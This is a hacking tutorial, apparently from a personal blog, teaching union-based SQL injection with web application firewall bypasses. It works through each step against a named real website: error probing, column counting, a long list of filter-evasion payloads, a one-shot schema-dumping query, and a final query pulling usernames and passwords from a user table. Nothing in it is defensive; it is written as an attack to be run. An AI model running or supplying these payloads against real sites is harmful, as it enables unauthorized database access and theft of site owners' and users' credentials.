Union Based SQL Injection (WAF Bypassing) Tutorial By Mr.cyb3rwarrior_Ades


After Our Tutorial on Basics Of SQL Injection.
Union based SQL injection + WAF Bypassing By Adesh

Today i m Going To Discuss About Union based SQL injection And WAF Bypassing Techniques.
Lets Start Injecting.
Target Site:http://radiozhakkasmarathi.in/full_review.php?id=3
Add Single Quote (') at the End Of The URL
http://radiozhakkasmarathi.in/full_review.php?id=3'



 And Get MYSQL Error.
Lets Balance Our Query  for Further Injecting.
--

http://radiozhakkasmarathi.in/full_review.php?id=3--+

http://radiozhakkasmarathi.in/full_review.php?id=3-- -

http://radiozhakkasmarathi.in/full_review.php?id=3%23

http://radiozhakkasmarathi.in/full_review.php?id=3;

Here Is A Small Explanation on Balance and Comment in our Injection.



After Balancing Our Query . Next is Count Total Number Of Columns
http://radiozhakkasmarathi.in/full_review.php?id=3' order by 1-- -
No Error !
http://radiozhakkasmarathi.in/full_review.php?id=3' order by 3-- -
No Error!

http://radiozhakkasmarathi.in/full_review.php?id=3'  order by 6-- -
Again No Error !

http://radiozhakkasmarathi.in/full_review.php?id=3'  order by 7-- -
Here We Get Error !
Error 2

Now Try To Find Our Vulnerable Columns.
http://radiozhakkasmarathi.in/full_review.php?id=-3'  union select 1,2,3,4,5,6-- -



If Our Target site Is Protected with WAF . WAF Will Block Our Query and Give Us Mod_Security Error.
So Here some WAF Bypassing Methods.
    /*!%55NiOn*/ /*!%53eLEct*/
    %55nion(%53elect 1,2,3)-- -
    +union+distinct+select+
    +union+distinctROW+select+
    /**//*!12345UNION SELECT*//**/
    /**//*!50000UNION SELECT*//**/
    /**/UNION/**//*!50000SELECT*//**/
    /*!50000UniON SeLeCt*/
    union /*!50000%53elect*/
    +#uNiOn+#sEleCt
    +#1q%0AuNiOn all#qa%0A#%0AsEleCt
    /*!%55NiOn*/ /*!%53eLEct*/
    /*!u%6eion*/ /*!se%6cect*/
    +un/**/ion+se/**/lect
    uni%0bon+se%0blect
    %2f**%2funion%2f**%2fselect
    union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
    REVERSE(noinu)+REVERSE(tceles)
    /*--*/union/*--*/select/*--*/
    union (/*!/**/ SeleCT */ 1,2,3)
    /*!union*/+/*!select*/
    union+/*!select*/
    /**/union/**/select/**/
    /**/uNIon/**/sEleCt/**/
    /**//*!union*//**//*!select*//**/
    /*!uNIOn*/ /*!SelECt*/
    +union+distinct+select+
    +union+distinctROW+select+
Just Change The Union Select With Following Bypass URLs.

Lets Continue Our Tutorial.
Here Are Some Vulnerable Columns Checking Methods With Examples.
Using And 0
http://www.targetsite.com/news.php?id=11 and 0 Union Select 1,2,3,4,5--+

Using And False
http://www.targetsite.com/news.php?id=11 and false Union Select 1,2,3,4,5--+

Using Div 0
http://www.targetsite.com/news.php?id=11 Div 0 Union Select 1,2,3,4,5--+

Using null
http://www.targetsite.com/news.php?id=null Union Select 1,2,3,4,5--+

Using .1337
http://www.targetsite.com/news.php?id=11.1337 Union Select 1,2,3,4,5--+


http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+

and
**************For Our Target We use
/*!50000union */ and concat/*!50000()*/

http://radiozhakkasmarathi.in/full_review.php?id=-3'  /*!50000union */  select 1,2,3,4,5,6-- -

We Will Get Our Vulnerable Columns Printed On The Page.2 is Our Vulnerable Column.


Here Are Some Variables Of  MYSQL.
@@version                           =  Current Version
@@GLOBAL.VERSION    = Current Version
User()                                   = Current User
Database                              = Current Database

for Version :http://radiozhakkasmarathi.in/full_review.php?id=-3'  /*!50000union */  select 1,@@version ,3,4,5,6-- -

We Can See Current Version Printed on the Page.
 Next Step Is To Get  The Tables.
we DIOS it

http://radiozhakkasmarathi.in/full_review.php?id=3' and 0 /*!50000Union*/ Select 1,concat/*!50000(0x3c666f6e7420636f6c6f723d7265643e3c746974746c653e4d722e635962337277615272696f725f41646573686b6f6c74653c746974746c653e,0x3c6c693e,version(),0x3c6c693e,user(),0x3c6c693e,database(),make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@))*/,3,4,5,6-- -

Lets Execute our DIOS Query



We can See Total Tables in Our Primary Database.
Now if you Want To Get Admin Details Of The Target Site check the Table name of Admin.
then  write Query
Example:
http://radiozhakkasmarathi.in/full_review.php?id=3' and 0 /*!50000Union*/ Select 1,concat/*!50000(username,0x3a3a,password)*/,3,4,5,6 from site_user -- -


For  Video TUtorial 
https://youtu.be/vImAtQKPb8U

Enjoy :]
Tutorial By Adesh kolte
contact Us on FB
https://www.facebook.com/kolteAdesh


Posted by at